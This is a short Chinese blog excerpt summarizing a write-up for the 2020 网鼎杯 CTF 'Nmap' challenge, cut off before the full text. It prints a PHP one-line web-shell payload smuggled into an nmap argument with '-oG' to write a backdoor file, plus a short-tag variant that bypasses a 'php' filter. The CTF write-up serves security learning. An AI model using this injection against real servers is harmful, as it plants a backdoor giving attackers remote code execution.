2020年5月29日
[网鼎杯 2020 朱雀组]Nmap
摘要: 和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o 阅读全文
posted @ 2020-05-29 18:34 山野村夫z1 阅读(2321) 评论(0) 推荐(0) 编辑